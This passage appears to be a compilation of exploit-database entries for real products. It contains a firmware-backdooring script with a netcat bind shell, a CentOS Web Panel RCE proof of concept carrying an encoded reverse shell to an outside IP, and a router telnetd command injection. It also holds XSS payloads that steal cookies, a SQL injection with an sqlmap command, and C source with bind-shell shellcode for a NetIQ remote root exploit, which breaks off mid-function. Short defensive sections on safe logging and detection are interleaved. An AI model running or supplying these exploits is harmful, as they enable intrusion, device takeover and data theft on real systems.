    with open("firmware.zip", "wb") as f:
        f.write(res.content)

    print("[*] downloading netcat")
    #res = requests.get(NETCAT_PRECOMPILED_FILE)
    #with open("netcat", "wb") as f:
    #    f.write(res.content)
    # the download above is disabled: a netcat binary built for the router's
    # architecture is expected next to this script (one level above tp_tmp)
    if not os.path.isfile("../netcat"):
        print("[!] netcat not found")
        exit()

    cmd('unzip firmware.zip')
    filename = glob.glob("TL-*.bin")[0]
    cmd(f"mv '{filename}' firmware.bin")
    cmd('binwalk --dd=".*" firmware.bin')
    cmd('fakeroot -s f.dat unsquashfs -d squashfs-root _firmware.bin.extracted/160200')

    with open("./squashfs-root/etc/init.d/back", "w") as f:
        f.write("""#!/bin/sh
while true;
do
    netcat -l -p 3030 -e /bin/sh
    sleep 5
done
""")
    cmd("chmod +x ./squashfs-root/etc/init.d/back")

    # rewrite rcS in place: read, seek back, overwrite and truncate (r+ alone would append)
    with open("./squashfs-root/etc/init.d/rcS", "r+") as f:
        content = f.read()
        content = content.replace("cos &", "/etc/init.d/back &\ncos &")
        f.seek(0)
        f.write(content)
        f.truncate()

    cmd("cp ../netcat ./squashfs-root/usr/bin/")
    cmd("chmod +x ./squashfs-root/usr/bin/netcat")
    cmd("fakeroot -i f.dat mksquashfs squashfs-root backdoor.squashfs -comp xz -b 262144")

    # reassemble: original header up to the squashfs offset, new squashfs, rest of the original image
    size = subprocess.check_output(["file", "backdoor.squashfs"]).decode()
    offset = int(size.split(" ")[9]) + 1442304
    cmd("dd if=firmware.bin of=backdoor.bin bs=1 count=1442304")
    cmd("dd if=backdoor.squashfs of=backdoor.bin bs=1 seek=1442304")
    cmd(f"dd if=firmware.bin of=backdoor.bin bs=1 seek={offset} skip={offset}")

    os.chdir('../')
    cmd("mv ./tp_tmp/backdoor.bin .")
    cmd("rm -r -f ./tp_tmp")


def upload_backdoor():
    wc = WebClient(TARGET_HOST, ADMIN_PASSWORD)
    print("[*] uploading backdoor")
    files = {
        'filename': open('backdoor.bin', 'rb')
    }
    re_upload = requests.post("http://" + TARGET_HOST + "/cgi/softup", cookies={
        "JSESSIONID": wc.jsessionid
    }, headers={
        "Referer": "http://192.168.0.1/mainFrame.htm"
    }, files=files)
    if re_upload.status_code != 200 or "OK" not in re_upload.text:
        print("[!] error")
        exit(1)
    print("[*] success!")
    print("\nWait for router restart, then run:")
    print("nc 192.168.0.1 3030")


build_backdoor()
upload_backdoor()
[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877
Description
--------------
Bash commands can be run because incorrect login entries are logged to the system inside double quotes, so shell expansions in the login value are evaluated.
Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY
Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close
username=root&password=toor&commit=Login
--------------
Solution
--------
Upgrade to CWP7 current version
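The description says the failed-login value is written to a log inside double quotes. As an added example that is not CWP's code, the Python below shows that pattern as a constructed shell command string (returned, never executed), the same write done safely with shlex.quote or with no shell at all, and a check for shell-expansion constructs in the login parameter of a request line that can be run over access logs. The sample request lines are constructed; function names are my own.

```python
import os
import shlex
import tempfile
from urllib.parse import unquote

# Constructs bash still expands inside double quotes: command substitution, backticks,
# and parameter expansion (the advisory's ${IFS} trick is the last one).
SHELL_EXPANSION_TOKENS = ("$(", "`", "${")

# Constructed request lines in the shape of the advisory's PoC (the "login" value is
# what gets logged), plus a benign one from a normal failed-login redirect.
SAMPLE_REQUESTS = [
    "POST /login/index.php?login=$(whoami) HTTP/1.1",
    "GET /login/index.php?login=failed HTTP/1.1",
    "POST /login/index.php?login=%24%28whoami%29 HTTP/1.1",
]


def shell_expansion_risk(value):
    return any(tok in value for tok in SHELL_EXPANSION_TOKENS)


def vulnerable_log_command(login_value, logfile):
    """Reconstruction of the unsafe pattern (an assumption, not CWP's source): the
    untrusted value is interpolated inside double quotes of a shell command line.
    The string is only returned for inspection; it is never executed here."""
    return 'echo "Login failed: %s" >> %s' % (login_value, shlex.quote(logfile))


def hardened_log_command(login_value, logfile):
    """If a shell must be used, single-quote the whole message with shlex.quote so
    $(...), backticks and ${IFS} are literal text."""
    return "echo %s >> %s" % (shlex.quote("Login failed: " + login_value), shlex.quote(logfile))


def safe_log(login_value, logfile, max_len=200):
    """Preferred fix: no shell at all. Drop control characters, truncate, append."""
    cleaned = "".join(ch for ch in login_value if ch.isprintable())[:max_len]
    with open(logfile, "a", encoding="utf-8") as fh:
        fh.write("Login failed: %s\n" % cleaned)
    return cleaned


def safe_log_roundtrip(login_value):
    """Log to a temporary file with safe_log and return exactly what was stored."""
    fd, path = tempfile.mkstemp(suffix=".log")
    os.close(fd)
    try:
        safe_log(login_value, path)
        with open(path, encoding="utf-8") as fh:
            return fh.read()
    finally:
        os.remove(path)


def flag_request_line(request_line):
    """Detection over an access-log request line: URL-decode the login parameter
    and look for shell-expansion constructs."""
    parts = request_line.split(" ")
    if len(parts) < 2 or "?" not in parts[1]:
        return False
    for pair in parts[1].split("?", 1)[1].split("&"):
        name, _, raw = pair.partition("=")
        if name == "login" and shell_expansion_risk(unquote(raw)):
            return True
    return False


if __name__ == "__main__":
    print(vulnerable_log_command("$(whoami)", "/var/log/cwp.log"))
    print(hardened_log_command("$(whoami)", "/var/log/cwp.log"))
    for line in SAMPLE_REQUESTS:
        print(flag_request_line(line), line)
```

The detector decodes before matching, so the percent-encoded form of the same payload is caught as well; the single-quoted command is inert because bash performs no expansion inside single quotes.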
# Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Execution (RCE) (Authenticated)
# Date: 19/10/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.nexxtsolutions.com/
# Version: 42.103.1.5095
# Tested on: ARN02304U8
# CVE : CVE-2022-44149

import requests
import base64

router_host = "http://192.168.1.1"
username = "admin"
password = "admin"


def main():
    send_payload("&telnetd")
    print("connect to router using: `telnet " + router_host.split("//")[1] + "` using known credentials")


def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")


def get_cookie(header):
    url = router_host + "/login"
    params = {"arg": header, "_n": 1}
    resp = requests.get(url, params=params)


def send_payload(payload):
    url = router_host + "/goform/sysTools"
    headers = {"Authorization": "Basic {}".format(gen_header(username, password))}
    params = {"tool": "0", "pingCount": "4", "host": payload, "sumbit": "OK"}
    requests.post(url, headers=headers, data=params)


if __name__ == '__main__':
    main()
## Title: AimOne Video Converter V2.04 Build 103 - Buffer Overflow (DoS)
## Author: nu11secur1ty
## Date: 01.05.2023
## Vendor: https://aimone-video-converter.software.informer.com/,
http://www.aimonesoft.com/
## Software: https://aimone-video-converter.software.informer.com/download/?ca85d0
## Reference:
## Description:
AimOne Video Converter V2.04 Build 103 suffers from a buffer
overflow and a local denial of service.
The registration form does not work properly and crashes the video converter
when the attacker decides to register the product. This can allow him
to easily crack the software and do more harm, depending on
the case.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Exploit:
```python
#!/usr/bin/python
# nu11secur1ty
print("WELCOME to the AIMONE Video Converter 2.04 Build 103 - Buffer Overflow exploit builder...\n")
input("Press any key to build the exploit...\n")
buffer = "\x41" * 7000
try:
    f = open("PoC.txt", "w")
    print("[+] Creating %s bytes exploit payload.." % len(buffer))
    f.write(buffer)
    f.close()
    print("[+] The PoC file was created!")
except:
    print("File cannot be created")
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/AimOne/AimOne-Video-Converter-V2.04-Build-103)
## Proof and Exploit:
[href](https://streamable.com/v1hvbf)
## Time spent
`00:35:00`
## Writing an exploit
`00:15:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
# Exploit Title: Yahoo User Interface library (YUI2) TreeView v2.8.2 - Multiple Reflected Cross Site Scripting (XSS)
# Google Dork: N/A
# Date: 2/1/2023
# Exploit Author: Rian Saaty
# Vendor Homepage: https://yui.github.io/yui2/
# Software Link: https://yui.github.io/yui2/
# Version: 2.8.2
# Tested on: MacOS, WindowsOS, LinuxOS
# CVE : CVE-2022-48197
YUI2 has many reflected XSS vulnerabilities in most of its files. A sample
of the vulnerable files, along with the exploit, can be found here:
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
https://localhost/libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(%22xss%22)%3C/script%3E
Twitter: @Ryan_412_
# Exploit Title: PMB 7.4.6 - SQL Injection
# Google Dork: inurl:opac_css
# Date: 2023-01-06
# Exploit Author: str0xo DZ (Walid Ben) https://github.com/Str0xo
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 7.4.6
-==== Software Description ====-
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.
PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
The main functions of PMB are :
* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...
-==== Vulnerability ====-
URL:
https://localhost/opac_css/ajax.php?categ=storage&datetime=undefined&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))SHde)&module=ajax&sub=save&token=undefined
Parameter:
id
-==== Vulnerability Details ====-
URL encoded GET input id was set to if(now()=sysdate(),sleep(6),0)
Tests performed:
if(now()=sysdate(),sleep(15),0) => 15.43
if(now()=sysdate(),sleep(6),0) => 6.445
if(now()=sysdate(),sleep(15),0) => 15.421
if(now()=sysdate(),sleep(3),0) => 3.409
if(now()=sysdate(),sleep(0),0) => 0.415
if(now()=sysdate(),sleep(0),0) => 0.413
if(now()=sysdate(),sleep(6),0) => 6.41
Using SQLMAP :
sqlmap -u "http://localhost/pmb/opac_css/ajax.php?categ=storage&datetime=undefined&id=1&module=ajax&sub=save&token=undefined" -p "id"
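The timings listed under "Tests performed" are what make this a confirmed time-based injection rather than a slow server. As an added example not taken from the advisory, the Python below encodes that reasoning: it takes (requested delay, observed seconds) pairs, derives the baseline from the sleep(0) runs and accepts the finding only when every response scales with the requested delay, and it flags query parameters that carry delay functions so the same URLs can be spotted in web logs. The advisory's numbers are copied in as the sample; function names are my own.

```python
import re
from statistics import median
from urllib.parse import parse_qs, unquote_plus, urlsplit

# The advisory's "Tests performed" table, copied as (requested sleep seconds, observed seconds).
OBSERVED = [(15, 15.43), (6, 6.445), (15, 15.421), (3, 3.409), (0, 0.415), (0, 0.413), (6, 6.41)]

# Delay primitives of the common engines: MySQL/MariaDB, PostgreSQL, MSSQL.
TIME_FUNCS = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.IGNORECASE)


def confirms_time_based(samples, tolerance=1.0):
    """True when observed time == requested delay + a stable baseline for every sample.
    Requires sleep(0) runs for the baseline and at least two distinct non-zero delays,
    so one slow request or a fixed server-side delay cannot pass as injection."""
    baseline_samples = [t for s, t in samples if s == 0]
    distinct_delays = {s for s, _ in samples if s > 0}
    if not baseline_samples or len(distinct_delays) < 2:
        return False
    baseline = median(baseline_samples)
    return all(abs(t - (s + baseline)) <= tolerance for s, t in samples)


def time_based_params(url):
    """Names of the query parameters whose (decoded) value carries a delay function."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return sorted(k for k, vals in q.items()
                  if any(TIME_FUNCS.search(unquote_plus(v)) for v in vals))


if __name__ == "__main__":
    print("confirmed:", confirms_time_based(OBSERVED))
    print(time_based_params("https://localhost/opac_css/ajax.php?categ=storage&id=if(now()=sysdate(),sleep(6),0)&module=ajax"))
```

The regex is a log-triage aid, not a WAF rule: it tells an analyst which requests to correlate with response times, and the timing check is what turns a suspicious URL into a confirmed finding.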
# Exploit Title: ELSI Smart Floor V3.3.3 - Stored Cross-Site Scripting (XSS)
# Date: 12/09/2022
# Exploit Author: Rob, CTRL Group
# Vendor Homepage: marigroup.com
# Version: V3.3.3 and under
# Tested on: Windows IIS all versions
# CVE : CVE-2022-35543
"Stored Cross-Site Scripting" vulnerability within the Elsi Smart Floor software. This vulnerability does require authentication; however, once the payload is stored, any user visiting the portal will trigger the alert.
Login to the application.
Browse to the "Settings" tab and then "Wards". Create a new ward with the following payload as the ward name:
<script>alert(document.cookie)</script>
Any user browsing the application will trigger the payload.
/*
# Exploit Title: NetIQ/Microfocus Performance Endpoint v5.1 - remote root/SYSTEM exploit
# Date: Jun 2007
# Exploit Author: mu-b
# Vendor Homepage: https://www.microfocus.com/en-us/cyberres/identity-access-management
# Version: All
# Tested on: Windows / Solaris x86/SPARC
# CVE : 0day
* endpoint-pown-uni.c
*
* Copyright (c) 2007 by <mu-b@digit-labs.org>
*
* NetIQ Performance Endpoint <=5.1 remote root/SYSTEM exploit
* by mu-b - Jun 2007
*
* $Id: endpoint-pown-uni.c 56 2021-04-23 10:15:49Z mu-b $
*
* - Tested on: NetIQ Performance Endpoint 5.1.15750 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15541 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1.15368 (win32)
* (Revised: December, 2012)
* NetIQ Performance Endpoint 5.1 (win32)
* NetIQ Performance Endpoint 4.2 (freebsd-x86)
* NetIQ Performance Endpoint 5.1 (solaris-SPARC+noexec-stack)
* (Revised: May 23, 2006)
*
*
* "No executable code (like Java or Visual Basic) is sent. There is no way
* to do something like 'run this command.' 100,000’s of endpoints have been
* installed worldwide without incident."
*
* "Endpoints do rigorous internal validation. For example, endpoints are not
* susceptible to 'buffer overrun' attacks used by hackers."
* - https://tinyurl.com/lgmblyj
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2007!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ifaddrs.h>
#include <limits.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <time.h>
#include <unistd.h>
#define IPV4_BUFLEN 16 /* "255.255.255.255\0" */
#define PORT_SHELL 10000
#define ENDPT_TCP_PORT 10115
#define ENDPT_PKTMAX 0x1388
static char ppkt_buf1[] =
"\x06" /* ENDPT_COMMAND_SETUP_E1 */
"\x07\x14\x43\x1A" /* verify_get_id (1) */
"\x00\x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00" /* */
"\x00\x02" /* len < 0x80 */
"\x00\x03" /* len < 0x40 */
"\x00" /* len < 0x40 */
"\x41\x41\x41\x41\x41\x41\x41\x41" /* */
"\x41\x41\x41\x41\x41\x41\x41\x41" /* */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x41\x41\x41\x41\x41\x41" /* */
"\x00\x00\x00\x01" /* */
"\x00\x00\x00\x02" /* 218h */
"\x00" /* */
"\x01" /* 1ACh */
"\x00\x00" /* */
"\x00" /* 254h */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf1_end[] =
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf2[] =
"\x06" /* ENDPT_COMMAND_SETUP_E1 */
"\x07\x14\x43\x1A" /* verify_get_id (1) */
"\x00\x22" /* copyright_smart_compare */
"Copyright Ganymede Software Inc."
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x00\x03" /* */
"\xff" /* code_convert_from_line */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x69" /* 210h */
"\x00\x00\x00\x69" /* var_C */
"\x00\x02" /* */
"\x00\x00\x00\x69" /* var_C */
"\x00\x00\x00\x69" /* 218h */
"\x69" /* */
"\x01" /* 1ACh */
"\x00\x00" /* */
"\x69" /* 254h */
"\x02" /* protocol */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char ppkt_buf2_end[] =
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x00\x03" /* len < 0x40 */
"\x00" /* */
"\x69" /* 0A8h */
"\x00\x03" /* len < 0x40 */
"\x00"; /* */
static char cpkt_buf1[] =
"\x07"
"AAAA";
static char cpkt_buf2[] =
"\x38"
"\x00\x04"
"AAAA";
static char x86_evil_len[] =
"\x11\xc0"; /* adc eax, eax */
#define X86_NOP_BYTE 0x90 /* nop */
static char sparc_evil_len[] =
"\x10\x80\x00\x3c"; /* ba */
static char sparc_nop[] =
"\x01\x00\x00\x00"; /* nop */
static char hammer_buf[] =
"\x00\x25\x38"
"\x00\x20"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00";
static char win32_x86_bind[] =
"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8e"
"\x2b\xb7\x2a\x83\xeb\xfc\xe2\xf4\x72\x41\x5c\x67\x66\xd2\x48\xd5"
"\x71\x4b\x3c\x46\xaa\x0f\x3c\x6f\xb2\xa0\xcb\x2f\xf6\x2a\x58\xa1"
"\xc1\x33\x3c\x75\xae\x2a\x5c\x63\x05\x1f\x3c\x2b\x60\x1a\x77\xb3"
"\x22\xaf\x77\x5e\x89\xea\x7d\x27\x8f\xe9\x5c\xde\xb5\x7f\x93\x02"
"\xfb\xce\x3c\x75\xaa\x2a\x5c\x4c\x05\x27\xfc\xa1\xd1\x37\xb6\xc1"
"\x8d\x07\x3c\xa3\xe2\x0f\xab\x4b\x4d\x1a\x6c\x4e\x05\x68\x87\xa1"
"\xce\x27\x3c\x5a\x92\x86\x3c\x6a\x86\x75\xdf\xa4\xc0\x25\x5b\x7a"
"\x71\xfd\xd1\x79\xe8\x43\x84\x18\xe6\x5c\xc4\x18\xd1\x7f\x48\xfa"
"\xe6\xe0\x5a\xd6\xb5\x7b\x48\xfc\xd1\xa2\x52\x4c\x0f\xc6\xbf\x28"
"\xdb\x41\xb5\xd5\x5e\x43\x6e\x23\x7b\x86\xe0\xd5\x58\x78\xe4\x79"
"\xdd\x78\xf4\x79\xcd\x78\x48\xfa\xe8\x43\x90\x3a\xe8\x78\x3e\xcb"
"\x1b\x43\x13\x30\xfe\xec\xe0\xd5\x58\x41\xa7\x7b\xdb\xd4\x67\x42"
"\x2a\x86\x99\xc3\xd9\xd4\x61\x79\xdb\xd4\x67\x42\x6b\x62\x31\x63"
"\xd9\xd4\x61\x7a\xda\x7f\xe2\xd5\x5e\xb8\xdf\xcd\xf7\xed\xce\x7d"
"\x71\xfd\xe2\xd5\x5e\x4d\xdd\x4e\xe8\x43\xd4\x47\x07\xce\xdd\x7a"
"\xd7\x02\x7b\xa3\x69\x41\xf3\xa3\x6c\x1a\x77\xd9\x24\xd5\xf5\x07"
"\x70\x69\x9b\xb9\x03\x51\x8f\x81\x25\x80\xdf\x58\x70\x98\xa1\xd5"
"\xfb\x6f\x48\xfc\xd5\x7c\xe5\x7b\xdf\x7a\xdd\x2b\xdf\x7a\xe2\x7b"
"\x71\xfb\xdf\x87\x57\x2e\x79\x79\x71\xfd\xdd\xd5\x71\x1c\x48\xfa"
"\x05\x7c\x4b\xa9\x4a\x4f\x48\xfc\xdc\xd4\x67\x42\x61\xe5\x57\x4a"
"\xdd\xd4\x61\xd5\x5e\x2b\xb7\x2a";
static char freebsd_x86_bind[] =
"\x6a\x61\x58\x99\x52\x68\x10\x02\x27\x10\x89\xe1\x52\x42\x52\x42"
"\x52\x6a\x10\xcd\x80\x99\x93\x51\x53\x52\x6a\x68\x58\xcd\x80\xb0"
"\x6a\xcd\x80\x52\x53\x52\xb0\x1e\xcd\x80\x97\x6a\x02\x59\x6a\x5a"
"\x58\x51\x57\x51\xcd\x80\x49\x79\xf5\x50\x68\x2f\x2f\x73\x68\x68"
"\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x53\xb0\x3b\xcd\x80";
static char solaris_sparc_bind[] =
"\x9c\x2b\xa0\x07\x98\x10\x20\x01\x96\x1a\xc0\x0b\x94\x1a\xc0\x0b"
"\x92\x10\x20\x02\x90\x10\x20\x02\x82\x10\x20\xe6\x91\xd0\x20\x08"
"\xd0\x23\xbf\xf8\x21\x00\x00\x89\xa0\x14\x23\x10\xe0\x23\xbf\xf0"
"\xc0\x23\xbf\xf4\x92\x23\xa0\x10\x94\x10\x20\x10\x82\x10\x20\xe8"
"\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x10\x20\x01\x82\x10\x20\xe9"
"\x91\xd0\x20\x08\xd0\x03\xbf\xf8\x92\x1a\x40\x09\x94\x12\x40\x09"
"\x82\x10\x20\xea\x91\xd0\x20\x08\xd0\x23\xbf\xf8\x94\x10\x20\x03"
"\x92\x10\x20\x09\x94\xa2\xa0\x01\x82\x10\x20\x3e\x91\xd0\x20\x08"
"\x12\xbf\xff\xfc\xd0\x03\xbf\xf8\x94\x1a\xc0\x0b\x21\x0b\xd8\x9a"
"\xa0\x14\x21\x6e\x23\x0b\xdc\xda\x90\x23\xa0\x10\x92\x23\xa0\x08"
"\xe0\x3b\xbf\xf0\xd0\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b"
"\x91\xd0\x20\x08";
static char solaris_x86_bind[] =
"\xb8\xff\xff\xff\xff\xba\xfd\xff\xd8\xef\xf7\xd0\xf7\xd2\x50\x52"
"\x89\xe7\x31\xdb\xf7\xe3\xb0\x02\x50\x52\x52\x50\x50\x50\xb0\xe6"
"\xcd\x91\x93\x6a\x10\x57\x53\x52\xb0\xe8\xcd\x91\x52\x53\x52\xb0"
"\xe9\xcd\x91\x52\x53\x6a\x02\xb0\xea\xcd\x91\x93\x92\x99\x59\x51"
"\x52\xb0\x06\xcd\x91\x51\x6a\x09\x53\x52\xb0\x3e\xcd\x91\x83\xc4"
"\x18\x49\x79\xeb\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x52\x53\x89\xe1\x52\x52\x51\x53\x52\xb0\x3b\xcd\x91";
#define NUM_TARGETS 7
#define ARCH_X86 0
#define ARCH_SPARC 1
struct target_t
{
  const char *name;
  const char *zshell;
  const int zshell_len;
  const int zshell_pkt_len;
  const int fp_indx;
  const int fp_offset;
  const int arch;
};

struct target_t targets[] = {
  { "NetIQ Endpoint 5.1.15750 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
  { "NetIQ Endpoint 5.1.15541 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x490, ARCH_X86 },
  { "NetIQ Endpoint 5.1.15368 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x488, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - Microsoft Windows (universal)",
    win32_x86_bind, sizeof win32_x86_bind, 0x11c0, 33, 0x480, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - FreeBSD (universal)",
    freebsd_x86_bind, sizeof freebsd_x86_bind, 0x11c0, 29, 0x3FC, ARCH_X86 },
  { "NetIQ Endpoint 5.1 - Solaris SPARC (universal)",
    solaris_sparc_bind, sizeof solaris_sparc_bind, 0x1080, 29, 0x400, ARCH_SPARC },
  { "NetIQ Endpoint 5.1 - Solaris x86 (universal)",
    solaris_x86_bind, sizeof solaris_x86_bind, 0x11c0, 29, 0x400, ARCH_X86 },
  {0}
};

static const char *quotes[] = {
  " \"No executable code (like Java or Visual Basic) is sent. There is no way\n"
  " to do something like 'run this command.' 100,000’s of endpoints have been\n"
  " installed worldwide without incident.\"",
  " \"Endpoints do rigorous internal validation. For example, endpoints are not\n"
  " susceptible to 'buffer overrun' attacks used by hackers.\""
};
static int verbose = 1; /* verbosity */
static int ppid, cpid; /* parent and child process id's */
static int get_localip_getifaddrs (in_addr_t *);
static int sock_send (int, char *, int);
static int sock_recv (int, char *, int);
static int sock_recv_str (int, char *, int);
static void shellami (int);
static void
fatal (void)
{
  kill (0, SIGKILL);
  exit (EXIT_FAILURE);
}

static int
get_localip_getifaddrs (in_addr_t *ip_addr)
{
  struct ifaddrs *ifa_head;
  int result;

  result = -1;
  if (getifaddrs (&ifa_head) == 0)
    {
      struct ifaddrs *ifa_cur;

      for (ifa_cur = ifa_head; ifa_cur; ifa_cur = ifa_cur->ifa_next)
        {
          if (ifa_cur->ifa_name != NULL && ifa_cur->ifa_addr != NULL)
            {
              if (ifa_cur->ifa_addr->sa_family != AF_INET ||
                  !(ifa_cur->ifa_flags & IFF_UP))
                continue;
              if (ifa_cur->ifa_flags & IFF_LOOPBACK)
                continue;

              memcpy (ip_addr,
                      &((struct sockaddr_in *) ifa_cur->ifa_addr)->sin_addr,
                      sizeof *ip_addr);
              result = 0;
              break;
            }
        }
      freeifaddrs (ifa_head);
    }

  return (result);
}

static int
sock_send (int fd, char *src, int len)
{
  int n;

  if ((n = send (fd, src, len, 0)) < 0)
    {
      perror ("send()");
      exit (EXIT_FAILURE);
    }

  return (n);
}

static int
sock_recv (int fd, char *dst, int len)
{
  int n;

  if ((n = recv (fd, dst, len, 0)) < 0)
    {
      perror ("recv()");
      exit (EXIT_FAILURE);
    }

  return (n);
}

static int
sock_recv_str (int fd, char *dst, int len)
{
  int n = sock_recv (fd, dst, len - 1);
  dst[n] = '\0';

  return (n);
}

static void
shellami (int fd)
{
  int n;
  fd_set rset;
  char rbuf[1024];

  while (1)
    {
      FD_ZERO (&rset);
      FD_SET (fd, &rset);
      FD_SET (STDIN_FILENO, &rset);

      if (select (fd + 1, &rset, NULL, NULL, NULL) < 0)
        {
          perror ("select()");
          fatal ();
        }

